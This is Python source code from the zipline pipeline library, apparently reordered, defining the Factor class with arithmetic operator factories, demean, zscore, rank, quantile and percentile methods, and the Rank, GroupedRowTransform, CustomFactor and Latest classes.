"x_0 {op} ({constant})".format(op=op, constant=other),
binds=(self,),
# .dtype access is safe here because coerce_numbers_to_my_dtype
# will convert any input numbers to numpy equivalents.
dtype=binop_return_dtype(op, self.dtype, other.dtype)
)
raise BadBinaryOperator(op, self, other)
return binary_operator
def reflected_binary_operator(op):
    """
    Factory function for making binary operator methods on a Factor.
    Returns a function, "reflected_binary_operator" suitable for implementing
    functions like __radd__.

    Parameters
    ----------
    op : str
        Arithmetic operator token from MATH_BINOPS. Comparisons never need a
        reflected form here, hence the assert below.
    """
    assert not is_comparison(op)
    @with_name(method_name_for_op(op, commute=True))
    @coerce_numbers_to_my_dtype
    def reflected_binary_operator(self, other):
        if isinstance(self, NumericalExpression):
            # Merge `other` into our expression tree; note the operands are
            # swapped relative to binary_operator because we are the RHS.
            self_expr, other_expr, new_inputs = self.build_binary_op(
                op, other
            )
            return NumExprFactor(
                "({left}) {op} ({right})".format(
                    left=other_expr,
                    right=self_expr,
                    op=op,
                ),
                new_inputs,
                dtype=binop_return_dtype(op, other.dtype, self.dtype)
            )
        # Only have to handle the numeric case because in all other valid cases
        # the corresponding left-binding method will be called.
        elif isinstance(other, Number):
            return NumExprFactor(
                "{constant} {op} x_0".format(op=op, constant=other),
                binds=(self,),
                dtype=binop_return_dtype(op, other.dtype, self.dtype),
            )
        raise BadBinaryOperator(op, other, self)
    return reflected_binary_operator
def unary_operator(op):
    """
    Factory function for making unary operator methods for Factors.

    Parameters
    ----------
    op : str
        Unary operator token. Only '-' (negation) is currently supported.
    """
    # Only negate is currently supported.
    valid_ops = {'-'}
    if op not in valid_ops:
        raise ValueError("Invalid unary operator %s." % op)
    @with_doc("Unary Operator: '%s'" % op)
    @with_name(unary_op_name(op))
    def unary_operator(self):
        if self.dtype != float64_dtype:
            raise TypeError(
                "Can't apply unary operator {op!r} to instance of "
                "{typename!r} with dtype {dtypename!r}.\n"
                "{op!r} is only supported for Factors of dtype "
                "'float64'.".format(
                    op=op,
                    typename=type(self).__name__,
                    dtypename=self.dtype.name,
                )
            )
        # This can't be hoisted up a scope because the types returned by
        # unary_op_return_type aren't defined when the top-level function is
        # invoked.
        if isinstance(self, NumericalExpression):
            # Wrap our existing expression tree in the unary op.
            return NumExprFactor(
                "{op}({expr})".format(op=op, expr=self._expr),
                self.inputs,
                dtype=float64_dtype,
            )
        else:
            # Plain term: bind it as x_0 in a fresh expression.
            return NumExprFactor(
                "{op}x_0".format(op=op),
                (self,),
                dtype=float64_dtype,
            )
    return unary_operator
def function_application(func):
    """
    Factory function for producing function application methods for Factor
    subclasses.

    Parameters
    ----------
    func : str
        Name of a numexpr-supported math function (e.g. 'log', 'abs').

    Returns
    -------
    mathfunc : callable
        A method producing a float64 NumExprFactor applying ``func`` to self.
    """
    if func not in NUMEXPR_MATH_FUNCS:
        raise ValueError("Unsupported mathematical function '%s'" % func)

    @with_name(func)
    def mathfunc(self):
        # An existing expression tree gets wrapped in place; any other term
        # is bound as the single input x_0 of a fresh expression.
        if isinstance(self, NumericalExpression):
            expr_str = "{func}({expr})".format(func=func, expr=self._expr)
            bound_inputs = self.inputs
        else:
            expr_str = "{func}(x_0)".format(func=func)
            bound_inputs = (self,)
        return NumExprFactor(expr_str, bound_inputs, dtype=float64_dtype)
    return mathfunc
def restrict_to_dtype(dtype, message_template):
    """
    A factory for decorators restricting Factor methods so they may only be
    called on Factors of one specific dtype.

    This is conceptually similar to
    zipline.utils.input_validation.expect_dtypes, but provides more
    flexibility for error messages aimed specifically at Factor methods.

    Parameters
    ----------
    dtype : numpy.dtype
        The dtype on which the decorated method may be called.
    message_template : str
        A template for the error message to be raised.
        `message_template.format` will be called with keyword arguments
        `method_name`, `expected_dtype`, and `received_dtype`.

    Usage
    -----
    @restrict_to_dtype(
        dtype=float64_dtype,
        message_template=(
            "{method_name}() was called on a factor of dtype {received_dtype}."
            "{method_name}() requires factors of dtype{expected_dtype}."
        ),
    )
    def some_factor_method(self, ...):
        self.stuff_that_requires_being_float64(...)
    """
    def processor(factor_method, _, factor_instance):
        # Pass the instance straight through when its dtype matches.
        if factor_instance.dtype == dtype:
            return factor_instance
        raise TypeError(
            message_template.format(
                method_name=factor_method.__name__,
                expected_dtype=dtype.name,
                received_dtype=factor_instance.dtype,
            )
        )
    # preprocess(self=...) runs `processor` on `self` before the method body.
    return preprocess(self=processor)
# Decorators for Factor methods.
# Guard for methods (isnan/notnan/isfinite) that only make sense on float64
# factors; points callers at isnull()/notnull() for other dtypes.
if_not_float64_tell_caller_to_use_isnull = restrict_to_dtype(
    dtype=float64_dtype,
    message_template=(
        "{method_name}() was called on a factor of dtype {received_dtype}.\n"
        "{method_name}() is only defined for dtype {expected_dtype}."
        "To filter missing data, use isnull() or notnull()."
    )
)
# Generic guard for methods (demean/zscore) defined only on float64 factors.
float64_only = restrict_to_dtype(
    dtype=float64_dtype,
    message_template=(
        "{method_name}() is only defined on Factors of dtype {expected_dtype},"
        " but it was called on a Factor of dtype {received_dtype}."
    )
)
# The complete set of dtypes a Factor may produce (see RestrictedDTypeMixin).
FACTOR_DTYPES = frozenset([datetime64ns_dtype, float64_dtype, int64_dtype])
class Factor(RestrictedDTypeMixin, ComputableTerm):
    """
    Pipeline API expression producing a numerical or date-valued output.
    Factors are the most commonly-used Pipeline term, representing the result
    of any computation producing a numerical result.
    Factors can be combined, both with other Factors and with scalar values,
    via any of the builtin mathematical operators (``+``, ``-``, ``*``, etc).
    This makes it easy to write complex expressions that combine multiple
    Factors. For example, constructing a Factor that computes the average of
    two other Factors is simply::
        >>> f1 = SomeFactor(...)
        >>> f2 = SomeOtherFactor(...)
        >>> average = (f1 + f2) / 2.0
    Factors can also be converted into :class:`zipline.pipeline.Filter` objects
    via comparison operators: (``<``, ``<=``, ``!=``, ``eq``, ``>``, ``>=``).
    There are many natural operators defined on Factors besides the basic
    numerical operators. These include methods identifying missing or
    extreme-valued outputs (isnull, notnull, isnan, notnan), methods for
    normalizing outputs (rank, demean, zscore), and methods for constructing
    Filters based on rank-order properties of results (top, bottom,
    percentile_between).
    """
    ALLOWED_DTYPES = FACTOR_DTYPES  # Used by RestrictedDTypeMixin
    # Dynamically add functions for creating NumExprFactor/NumExprFilter
    # instances.
    # NOTE: `locals()` here is the class body's namespace, so these updates
    # install operator methods directly onto the Factor class being defined.
    clsdict = locals()
    clsdict.update(
        {
            method_name_for_op(op): binary_operator(op)
            # Don't override __eq__ because it breaks comparisons on tuples of
            # Factors.
            for op in MATH_BINOPS.union(COMPARISONS - {'=='})
        }
    )
    clsdict.update(
        {
            method_name_for_op(op, commute=True): reflected_binary_operator(op)
            for op in MATH_BINOPS
        }
    )
    clsdict.update(
        {
            unary_op_name(op): unary_operator(op)
            for op in UNARY_OPS
        }
    )
    clsdict.update(
        {
            funcname: function_application(funcname)
            for funcname in NUMEXPR_MATH_FUNCS
        }
    )
    # Python 3's true division reuses the classic-division implementations
    # installed above.
    __truediv__ = clsdict['__div__']
    __rtruediv__ = clsdict['__rdiv__']
    # Element-wise equality is exposed as the named method `eq` rather than
    # `__eq__` (see comment above).
    eq = binary_operator('==')
    @expect_types(
        mask=(Filter, NotSpecifiedType),
        groupby=(Classifier, NotSpecifiedType),
    )
    @float64_only
    def demean(self, mask=NotSpecified, groupby=NotSpecified):
        """
        Construct a Factor that computes ``self`` and subtracts the mean from
        each row of the result.
        If ``mask`` is supplied, ignore values where ``mask`` returns False
        when computing row means, and output NaN anywhere the mask is False.
        If ``groupby`` is supplied, compute by partitioning each row based on
        the values produced by ``groupby``, de-meaning the partitioned arrays,
        and stitching the sub-results back together.
        Parameters
        ----------
        mask : zipline.pipeline.Filter, optional
            A Filter defining values to ignore when computing means.
        groupby : zipline.pipeline.Classifier, optional
            A classifier defining partitions over which to compute means.
        Example
        -------
        Let ``f`` be a Factor which would produce the following output::
                         AAPL   MSFT    MCD     BK
            2017-03-13    1.0    2.0    3.0    4.0
            2017-03-14    1.5    2.5    3.5    1.0
            2017-03-15    2.0    3.0    4.0    1.5
            2017-03-16    2.5    3.5    1.0    2.0
        Let ``c`` be a Classifier producing the following output::
                         AAPL   MSFT    MCD     BK
            2017-03-13      1      1      2      2
            2017-03-14      1      1      2      2
            2017-03-15      1      1      2      2
            2017-03-16      1      1      2      2
        Let ``m`` be a Filter producing the following output::
                         AAPL   MSFT    MCD     BK
            2017-03-13  False   True   True   True
            2017-03-14   True  False   True   True
            2017-03-15   True   True  False   True
            2017-03-16   True   True   True  False
        Then ``f.demean()`` will subtract the mean from each row produced by
        ``f``.
        ::
                         AAPL   MSFT    MCD     BK
            2017-03-13 -1.500 -0.500  0.500  1.500
            2017-03-14 -0.625  0.375  1.375 -1.125
            2017-03-15 -0.625  0.375  1.375 -1.125
            2017-03-16  0.250  1.250 -1.250 -0.250
        ``f.demean(mask=m)`` will subtract the mean from each row, but means
        will be calculated ignoring values on the diagonal, and NaNs will be
        written to the diagonal in the output. Diagonal values are ignored
        because they are the locations where the mask ``m`` produced False.
        ::
                         AAPL   MSFT    MCD     BK
            2017-03-13    NaN -1.000  0.000  1.000
            2017-03-14 -0.500    NaN  1.500 -1.000
            2017-03-15 -0.166  0.833    NaN -0.666
            2017-03-16  0.166  1.166 -1.333    NaN
        ``f.demean(groupby=c)`` will subtract the group-mean of AAPL/MSFT and
        MCD/BK from their respective entries. The AAPL/MSFT are grouped
        together because both assets always produce 1 in the output of the
        classifier ``c``. Similarly, MCD/BK are grouped together because they
        always produce 2.
        ::
                         AAPL   MSFT    MCD     BK
            2017-03-13 -0.500  0.500 -0.500  0.500
            2017-03-14 -0.500  0.500  1.250 -1.250
            2017-03-15 -0.500  0.500  1.250 -1.250
            2017-03-16 -0.500  0.500 -0.500  0.500
        ``f.demean(mask=m, groupby=c)`` will also subtract the group-mean of
        AAPL/MSFT and MCD/BK, but means will be calculated ignoring values on
        the diagonal , and NaNs will be written to the diagonal in the output.
        ::
                         AAPL   MSFT    MCD     BK
            2017-03-13    NaN  0.000 -0.500  0.500
            2017-03-14  0.000    NaN  1.250 -1.250
            2017-03-15 -0.500  0.500    NaN  0.000
            2017-03-16 -0.500  0.500  0.000    NaN
        Notes
        -----
        Mean is sensitive to the magnitudes of outliers. When working with
        factor that can potentially produce large outliers, it is often useful
        to use the ``mask`` parameter to discard values at the extremes of the
        distribution::
            >>> base = MyFactor(...)
            >>> normalized = base.demean(mask=base.percentile_between(1, 99))
        ``demean()`` is only supported on Factors of dtype float64.
        See Also
        --------
        :meth:`pandas.DataFrame.groupby`
        """
        # This is a named function so that it has a __name__ for use in the
        # graph repr of GroupedRowTransform.
        def demean(row):
            return row - nanmean(row)
        return GroupedRowTransform(
            transform=demean,
            factor=self,
            mask=mask,
            groupby=groupby,
        )
    @expect_types(
        mask=(Filter, NotSpecifiedType),
        groupby=(Classifier, NotSpecifiedType),
    )
    @float64_only
    def zscore(self, mask=NotSpecified, groupby=NotSpecified):
        """
        Construct a Factor that Z-Scores each day's results.
        The Z-Score of a row is defined as::
            (row - row.mean()) / row.stddev()
        If ``mask`` is supplied, ignore values where ``mask`` returns False
        when computing row means and standard deviations, and output NaN
        anywhere the mask is False.
        If ``groupby`` is supplied, compute by partitioning each row based on
        the values produced by ``groupby``, z-scoring the partitioned arrays,
        and stitching the sub-results back together.
        Parameters
        ----------
        mask : zipline.pipeline.Filter, optional
            A Filter defining values to ignore when Z-Scoring.
        groupby : zipline.pipeline.Classifier, optional
            A classifier defining partitions over which to compute Z-Scores.
        Returns
        -------
        zscored : zipline.pipeline.Factor
            A Factor that z-scores the output of self.
        Notes
        -----
        Mean and standard deviation are sensitive to the magnitudes of
        outliers. When working with factor that can potentially produce large
        outliers, it is often useful to use the ``mask`` parameter to discard
        values at the extremes of the distribution::
            >>> base = MyFactor(...)
            >>> normalized = base.zscore(mask=base.percentile_between(1, 99))
        ``zscore()`` is only supported on Factors of dtype float64.
        Example
        -------
        See :meth:`~zipline.pipeline.factors.Factor.demean` for an in-depth
        example of the semantics for ``mask`` and ``groupby``.
        See Also
        --------
        :meth:`pandas.DataFrame.groupby`
        """
        # This is a named function so that it has a __name__ for use in the
        # graph repr of GroupedRowTransform.
        def zscore(row):
            return (row - nanmean(row)) / nanstd(row)
        return GroupedRowTransform(
            transform=zscore,
            factor=self,
            mask=mask,
            groupby=groupby,
        )
    def rank(self, method='ordinal', ascending=True, mask=NotSpecified):
        """
        Construct a new Factor representing the sorted rank of each column
        within each row.
        Parameters
        ----------
        method : str, {'ordinal', 'min', 'max', 'dense', 'average'}
            The method used to assign ranks to tied elements. See
            `scipy.stats.rankdata` for a full description of the semantics for
            each ranking method. Default is 'ordinal'.
        ascending : bool, optional
            Whether to return sorted rank in ascending or descending order.
            Default is True.
        mask : zipline.pipeline.Filter, optional
            A Filter representing assets to consider when computing ranks.
            If mask is supplied, ranks are computed ignoring any asset/date
            pairs for which `mask` produces a value of False.
        Returns
        -------
        ranks : zipline.pipeline.factors.Rank
            A new factor that will compute the ranking of the data produced by
            `self`.
        Notes
        -----
        The default value for `method` is different from the default for
        `scipy.stats.rankdata`. See that function's documentation for a full
        description of the valid inputs to `method`.
        Missing or non-existent data on a given day will cause an asset to be
        given a rank of NaN for that day.
        See Also
        --------
        :func:`scipy.stats.rankdata`
        :class:`zipline.pipeline.factors.factor.Rank`
        """
        return Rank(self, method=method, ascending=ascending, mask=mask)
    @expect_types(bins=int, mask=(Filter, NotSpecifiedType))
    def quantiles(self, bins, mask=NotSpecified):
        """
        Construct a Classifier computing quantiles of the output of ``self``.
        Every non-NaN data point in the output is labelled with an integer
        value from 0 to (bins - 1). NaNs are labelled with -1.
        If ``mask`` is supplied, ignore data points in locations for which
        ``mask`` produces False, and emit a label of -1 at those locations.
        Parameters
        ----------
        bins : int
            Number of bin labels to compute.
        mask : zipline.pipeline.Filter, optional
            Mask of values to ignore when computing quantiles.
        Returns
        -------
        quantiles : zipline.pipeline.classifiers.Quantiles
            A Classifier producing integer labels ranging from 0 to (bins - 1).
        """
        if mask is NotSpecified:
            mask = self.mask
        return Quantiles(inputs=(self,), bins=bins, mask=mask)
    @expect_types(mask=(Filter, NotSpecifiedType))
    def quartiles(self, mask=NotSpecified):
        """
        Construct a Classifier computing quartiles over the output of ``self``.
        Every non-NaN data point in the output is labelled with a value of
        either 0, 1, 2, or 3, corresponding to the first, second, third, or
        fourth quartile over each row. NaN data points are labelled with -1.
        If ``mask`` is supplied, ignore data points in locations for which
        ``mask`` produces False, and emit a label of -1 at those locations.
        Parameters
        ----------
        mask : zipline.pipeline.Filter, optional
            Mask of values to ignore when computing quartiles.
        Returns
        -------
        quartiles : zipline.pipeline.classifiers.Quantiles
            A Classifier producing integer labels ranging from 0 to 3.
        """
        return self.quantiles(bins=4, mask=mask)
    @expect_types(mask=(Filter, NotSpecifiedType))
    def quintiles(self, mask=NotSpecified):
        """
        Construct a Classifier computing quintile labels on ``self``.
        Every non-NaN data point in the output is labelled with a value of
        either 0, 1, 2, 3, or 4, corresponding to quintiles over each row. NaN
        data points are labelled with -1.
        If ``mask`` is supplied, ignore data points in locations for which
        ``mask`` produces False, and emit a label of -1 at those locations.
        Parameters
        ----------
        mask : zipline.pipeline.Filter, optional
            Mask of values to ignore when computing quintiles.
        Returns
        -------
        quintiles : zipline.pipeline.classifiers.Quantiles
            A Classifier producing integer labels ranging from 0 to 4.
        """
        return self.quantiles(bins=5, mask=mask)
    @expect_types(mask=(Filter, NotSpecifiedType))
    def deciles(self, mask=NotSpecified):
        """
        Construct a Classifier computing decile labels on ``self``.
        Every non-NaN data point in the output is labelled with a value from 0
        to 9 corresponding to deciles over each row. NaN data points are
        labelled with -1.
        If ``mask`` is supplied, ignore data points in locations for which
        ``mask`` produces False, and emit a label of -1 at those locations.
        Parameters
        ----------
        mask : zipline.pipeline.Filter, optional
            Mask of values to ignore when computing deciles.
        Returns
        -------
        deciles : zipline.pipeline.classifiers.Quantiles
            A Classifier producing integer labels ranging from 0 to 9.
        """
        return self.quantiles(bins=10, mask=mask)
    def top(self, N, mask=NotSpecified):
        """
        Construct a Filter matching the top N asset values of self each day.
        Parameters
        ----------
        N : int
            Number of assets passing the returned filter each day.
        mask : zipline.pipeline.Filter, optional
            A Filter representing assets to consider when computing ranks.
            If mask is supplied, top values are computed ignoring any
            asset/date pairs for which `mask` produces a value of False.
        Returns
        -------
        filter : zipline.pipeline.filters.Filter
        """
        return self.rank(ascending=False, mask=mask) <= N
    def bottom(self, N, mask=NotSpecified):
        """
        Construct a Filter matching the bottom N asset values of self each day.
        Parameters
        ----------
        N : int
            Number of assets passing the returned filter each day.
        mask : zipline.pipeline.Filter, optional
            A Filter representing assets to consider when computing ranks.
            If mask is supplied, bottom values are computed ignoring any
            asset/date pairs for which `mask` produces a value of False.
        Returns
        -------
        filter : zipline.pipeline.Filter
        """
        return self.rank(ascending=True, mask=mask) <= N
    def percentile_between(self,
                           min_percentile,
                           max_percentile,
                           mask=NotSpecified):
        """
        Construct a new Filter representing entries from the output of this
        Factor that fall within the percentile range defined by min_percentile
        and max_percentile.
        Parameters
        ----------
        min_percentile : float [0.0, 100.0]
            Return True for assets falling above this percentile in the data.
        max_percentile : float [0.0, 100.0]
            Return True for assets falling below this percentile in the data.
        mask : zipline.pipeline.Filter, optional
            A Filter representing assets to consider when calculating
            percentile thresholds. If mask is supplied, percentile cutoffs
            are computed each day using only assets for which ``mask`` returns
            True. Assets for which ``mask`` produces False will produce False
            in the output of this Factor as well.
        Returns
        -------
        out : zipline.pipeline.filters.PercentileFilter
            A new filter that will compute the specified percentile-range mask.
        See Also
        --------
        zipline.pipeline.filters.filter.PercentileFilter
        """
        return PercentileFilter(
            self,
            min_percentile=min_percentile,
            max_percentile=max_percentile,
            mask=mask,
        )
    def isnull(self):
        """
        A Filter producing True for values where this Factor has missing data.
        Equivalent to self.isnan() when ``self.dtype`` is float64.
        Otherwise equivalent to ``self.eq(self.missing_value)``.
        Returns
        -------
        filter : zipline.pipeline.filters.Filter
        """
        if self.dtype == float64_dtype:
            # Using isnan is more efficient when possible because we can fold
            # the isnan computation with other NumExpr expressions.
            return self.isnan()
        else:
            return NullFilter(self)
    def notnull(self):
        """
        A Filter producing True for values where this Factor has complete data.
        Equivalent to ``~self.isnan()`` when ``self.dtype`` is float64.
        Otherwise equivalent to ``(self != self.missing_value)``.
        """
        return ~self.isnull()
    @if_not_float64_tell_caller_to_use_isnull
    def isnan(self):
        """
        A Filter producing True for all values where this Factor is NaN.
        Returns
        -------
        nanfilter : zipline.pipeline.filters.Filter
        """
        # NaN is the only float value that compares unequal to itself.
        return self != self
    @if_not_float64_tell_caller_to_use_isnull
    def notnan(self):
        """
        A Filter producing True for values where this Factor is not NaN.
        Returns
        -------
        nanfilter : zipline.pipeline.filters.Filter
        """
        return ~self.isnan()
    @if_not_float64_tell_caller_to_use_isnull
    def isfinite(self):
        """
        A Filter producing True for values where this Factor is anything but
        NaN, inf, or -inf.
        """
        # NaN fails both comparisons, and each infinity fails one of them.
        return (-inf < self) & (self < inf)
class NumExprFactor(NumericalExpression, Factor):
    """
    Factor computed from a numexpr expression.

    Parameters
    ----------
    expr : string
        A string suitable for passing to numexpr. All variables in 'expr'
        should be of the form "x_i", where i is the index of the corresponding
        factor input in 'binds'.
    binds : tuple
        A tuple of factors to use as inputs.

    Notes
    -----
    NumExprFactors are constructed by numerical operators like `+` and `-`.
    Users should rarely need to construct a NumExprFactor directly.
    """
    # All behavior is inherited: expression evaluation from
    # NumericalExpression, operator/normalization methods from Factor.
    pass
class GroupedRowTransform(Factor):
    """
    A Factor that transforms an input factor by applying a row-wise
    shape-preserving transformation on classifier-defined groups of that
    Factor.
    This is most often useful for normalization operators like ``zscore`` or
    ``demean``.
    Parameters
    ----------
    transform : function[ndarray[ndim=1] -> ndarray[ndim=1]]
        Function to apply over each row group.
    factor : zipline.pipeline.Factor
        The factor providing baseline data to transform.
    mask : zipline.pipeline.Filter
        Mask of entries to ignore when calculating transforms.
    groupby : zipline.pipeline.Classifier
        Classifier partitioning ``factor`` into groups to use when calculating
        means.
    Notes
    -----
    Users should rarely construct instances of this factor directly. Instead,
    they should construct instances via factor normalization methods like
    ``zscore`` and ``demean``.
    See Also
    --------
    zipline.pipeline.factors.Factor.zscore
    zipline.pipeline.factors.Factor.demean
    """
    # The transform is row-wise over already-loaded data; no lookback needed.
    window_length = 0
    def __new__(cls, transform, factor, mask, groupby):
        # Restrict our mask to the factor's own mask; an explicit mask is
        # intersected with it.
        if mask is NotSpecified:
            mask = factor.mask
        else:
            mask = mask & factor.mask
        # No classifier means one big group containing every masked asset.
        if groupby is NotSpecified:
            groupby = Everything(mask=mask)
        # NOTE(review): the class is hard-coded here rather than using `cls`,
        # so subclasses would still construct GroupedRowTransform instances —
        # presumably intentional since this class is not meant for subclassing.
        return super(GroupedRowTransform, cls).__new__(
            GroupedRowTransform,
            transform=transform,
            inputs=(factor, groupby),
            missing_value=factor.missing_value,
            mask=mask,
            dtype=factor.dtype,
        )
    def _init(self, transform, *args, **kwargs):
        # Stash the transform; everything else is handled by Term._init.
        self._transform = transform
        return super(GroupedRowTransform, self)._init(*args, **kwargs)
    @classmethod
    def static_identity(cls, transform, *args, **kwargs):
        # Include the transform in the term-memoization key so that, e.g.,
        # demean and zscore of the same factor are distinct terms.
        return (
            super(GroupedRowTransform, cls).static_identity(*args, **kwargs),
            transform,
        )
    def _compute(self, arrays, dates, assets, mask):
        data = arrays[0]
        null_group_value = self.inputs[1].missing_value
        # Masked-out cells get the classifier's missing value as their group
        # label so they are excluded from every real group.
        group_labels = where(
            mask,
            arrays[1],
            null_group_value,
        )
        # Apply the transform per (row, group); emit missing_value wherever
        # the label is the null group.
        return where(
            group_labels != null_group_value,
            naive_grouped_rowwise_apply(
                data=data,
                group_labels=group_labels,
                func=self._transform,
            ),
            self.missing_value,
        )
    @property
    def transform_name(self):
        # Name of the wrapped transform function (e.g. 'demean', 'zscore').
        return self._transform.__name__
    def short_repr(self):
        # Used in pipeline dependency-graph rendering.
        return type(self).__name__ + '(%r)' % self.transform_name
class Rank(SingleInputMixin, Factor):
    """
    A Factor representing the row-wise rank data of another Factor.
    Parameters
    ----------
    factor : zipline.pipeline.factors.Factor
        The factor on which to compute ranks.
    method : str, {'average', 'min', 'max', 'dense', 'ordinal'}
        The method used to assign ranks to tied elements. See
        `scipy.stats.rankdata` for a full description of the semantics for each
        ranking method.
    See Also
    --------
    :func:`scipy.stats.rankdata`
    :class:`Factor.rank`
    Notes
    -----
    Most users should call Factor.rank rather than directly construct an
    instance of this class.
    """
    # Ranks are computed row-wise over the input's current values.
    window_length = 0
    # Ranks are always floats so that missing entries can be NaN.
    dtype = float64_dtype
    def __new__(cls, factor, method, ascending, mask):
        return super(Rank, cls).__new__(
            cls,
            inputs=(factor,),
            method=method,
            ascending=ascending,
            mask=mask,
        )
    def _init(self, method, ascending, *args, **kwargs):
        # Stash rank parameters; the rest is handled by Term._init.
        self._method = method
        self._ascending = ascending
        return super(Rank, self)._init(*args, **kwargs)
    @classmethod
    def static_identity(cls, method, ascending, *args, **kwargs):
        # Include rank parameters in the term-memoization key.
        return (
            super(Rank, cls).static_identity(*args, **kwargs),
            method,
            ascending,
        )
    def _validate(self):
        """
        Verify that the stored rank method is valid.
        """
        if self._method not in _RANK_METHODS:
            raise UnknownRankMethod(
                method=self._method,
                choices=set(_RANK_METHODS),
            )
        return super(Rank, self)._validate()
    def _compute(self, arrays, dates, assets, mask):
        """
        For each row in the input, compute a like-shaped array of per-row
        ranks.
        """
        return masked_rankdata_2d(
            arrays[0],
            mask,
            self.inputs[0].missing_value,
            self._method,
            self._ascending,
        )
    def __repr__(self):
        return "{type}({input_}, method='{method}', mask={mask})".format(
            type=type(self).__name__,
            input_=self.inputs[0],
            method=self._method,
            mask=self.mask,
        )
class CustomFactor(PositiveWindowLengthMixin, CustomTermMixin, Factor):
    '''
    Base class for user-defined Factors.
    Parameters
    ----------
    inputs : iterable, optional
        An iterable of `BoundColumn` instances (e.g. USEquityPricing.close),
        describing the data to load and pass to `self.compute`. If this
        argument is not passed to the CustomFactor constructor, we look for a
        class-level attribute named `inputs`.
    window_length : int, optional
        Number of rows to pass for each input. If this argument is not passed
        to the CustomFactor constructor, we look for a class-level attribute
        named `window_length`.
    mask : zipline.pipeline.Filter, optional
        A Filter describing the assets on which we should compute each day.
        Each call to ``CustomFactor.compute`` will only receive assets for
        which ``mask`` produced True on the day for which compute is being
        called.
    Notes
    -----
    Users implementing their own Factors should subclass CustomFactor and
    implement a method named `compute` with the following signature:
    .. code-block:: python
        def compute(self, today, assets, out, *inputs):
           ...
    On each simulation date, ``compute`` will be called with the current date,
    an array of sids, an output array, and an input array for each expression
    passed as inputs to the CustomFactor constructor.
    The specific types of the values passed to `compute` are as follows::
        today : np.datetime64[ns]
            Row label for the last row of all arrays passed as `inputs`.
        assets : np.array[int64, ndim=1]
            Column labels for `out` and `inputs`.
        out : np.array[self.dtype, ndim=1]
            Output array of the same shape as `assets`.  `compute` should write
            its desired return values into `out`.
        *inputs : tuple of np.array
            Raw data arrays corresponding to the values of `self.inputs`.
    ``compute`` functions should expect to be passed NaN values for dates on
    which no data was available for an asset.  This may include dates on which
    an asset did not yet exist.
    For example, if a CustomFactor requires 10 rows of close price data, and
    asset A started trading on Monday June 2nd, 2014, then on Tuesday, June
    3rd, 2014, the column of input data for asset A will have 9 leading NaNs
    for the preceding days on which data was not yet available.
    Examples
    --------
    A CustomFactor with pre-declared defaults:
    .. code-block:: python
        class TenDayRange(CustomFactor):
            """
            Computes the difference between the highest high in the last 10
            days and the lowest low.
            Pre-declares high and low as default inputs and `window_length` as
            10.
            """
            inputs = [USEquityPricing.high, USEquityPricing.low]
            window_length = 10
            def compute(self, today, assets, out, highs, lows):
                from numpy import nanmin, nanmax
                highest_highs = nanmax(highs, axis=0)
                lowest_lows = nanmin(lows, axis=0)
                out[:] = highest_highs - lowest_lows
        # Doesn't require passing inputs or window_length because they're
        # pre-declared as defaults for the TenDayRange class.
        ten_day_range = TenDayRange()
    A CustomFactor without defaults:
    .. code-block:: python
        class MedianValue(CustomFactor):
            """
            Computes the median value of an arbitrary single input over an
            arbitrary window.
            Does not declare any defaults, so values for `window_length` and
            `inputs` must be passed explicitly on every construction.
            """
            def compute(self, today, assets, out, data):
                from numpy import nanmedian
                out[:] = nanmedian(data, axis=0)
        # Values for `inputs` and `window_length` must be passed explicitly to
        # MedianValue.
        median_close10 = MedianValue([USEquityPricing.close], window_length=10)
        median_low15 = MedianValue([USEquityPricing.low], window_length=15)
    '''
    # Default output dtype for user factors; subclasses may override.
    dtype = float64_dtype
class Latest(LatestMixin, CustomFactor):
    """
    Factor producing the most recently-known value of `inputs[0]` on each day.
    The `.latest` attribute of DataSet columns returns an instance of this
    Factor.
    """
    # A single-row window is enough to read the most recent value.
    window_length = 1
    def compute(self, today, assets, out, data):
        # The last row of the input window is the most recent observation.
        out[:] = data[-1]
| 33.506816
| 79
| 0.604026
|
from functools import wraps
from operator import attrgetter
from numbers import Number
from numpy import inf, where
from toolz import curry
from zipline.errors import UnknownRankMethod
from zipline.lib.normalize import naive_grouped_rowwise_apply
from zipline.lib.rank import masked_rankdata_2d
from zipline.pipeline.classifiers import Classifier, Everything, Quantiles
from zipline.pipeline.mixins import (
CustomTermMixin,
LatestMixin,
PositiveWindowLengthMixin,
RestrictedDTypeMixin,
SingleInputMixin,
)
from zipline.pipeline.term import (
ComputableTerm,
NotSpecified,
NotSpecifiedType,
Term,
)
from zipline.pipeline.expression import (
BadBinaryOperator,
COMPARISONS,
is_comparison,
MATH_BINOPS,
method_name_for_op,
NumericalExpression,
NUMEXPR_MATH_FUNCS,
UNARY_OPS,
unary_op_name,
)
from zipline.pipeline.filters import (
Filter,
NumExprFilter,
PercentileFilter,
NullFilter,
)
from zipline.utils.input_validation import expect_types
from zipline.utils.math_utils import nanmean, nanstd
from zipline.utils.numpy_utils import (
bool_dtype,
coerce_to_dtype,
datetime64ns_dtype,
float64_dtype,
int64_dtype,
)
from zipline.utils.preprocess import preprocess
# Valid values for the `method` argument to Factor.rank / Rank._validate;
# mirrors the methods accepted by scipy.stats.rankdata.
_RANK_METHODS = frozenset(['average', 'min', 'max', 'dense', 'ordinal'])
def coerce_numbers_to_my_dtype(f):
    """
    Decorator for two-argument methods that converts a plain-number ``other``
    argument to ``self.dtype`` before invoking the wrapped method.

    Non-number arguments are passed through untouched.
    """
    @wraps(f)
    def method(self, other):
        coerced = (
            coerce_to_dtype(self.dtype, other)
            if isinstance(other, Number)
            else other
        )
        return f(self, coerced)
    return method
@curry
def set_attribute(name, value):
    """
    Decorator factory for setting attributes on a function.
    Doesn't change the behavior of the wrapped function.
    Usage
    -----
    >>> @set_attribute('__name__', 'foo')
    ... def bar():
    ...     return 3
    ...
    >>> bar()
    3
    >>> bar.__name__
    'foo'
    """
    def decorator(f):
        setattr(f, name, value)
        return f
    return decorator
# Decorators for setting the __name__ and __doc__ properties of a decorated
# function. Example: @with_name('__add__') def binary_operator(...): ...
with_name = set_attribute('__name__')
with_doc = set_attribute('__doc__')
def binop_return_type(op):
    """
    Return the term type produced by applying ``op``: comparison operators
    build filters, arithmetic operators build factors.
    """
    return NumExprFilter if is_comparison(op) else NumExprFactor
def binop_return_dtype(op, left, right):
    """
    Compute the expected return dtype for the given binary operator.

    Parameters
    ----------
    op : str
        Operator symbol, (e.g. '+', '-', ...).
    left : numpy.dtype
        Dtype of left hand side.
    right : numpy.dtype
        Dtype of right hand side.

    Returns
    -------
    outdtype : numpy.dtype
        The dtype of the result of `left <op> right`.

    Raises
    ------
    TypeError
        If the operands' dtypes are not supported for ``op``.
    """
    comparison = is_comparison(op)
    if comparison and left != right:
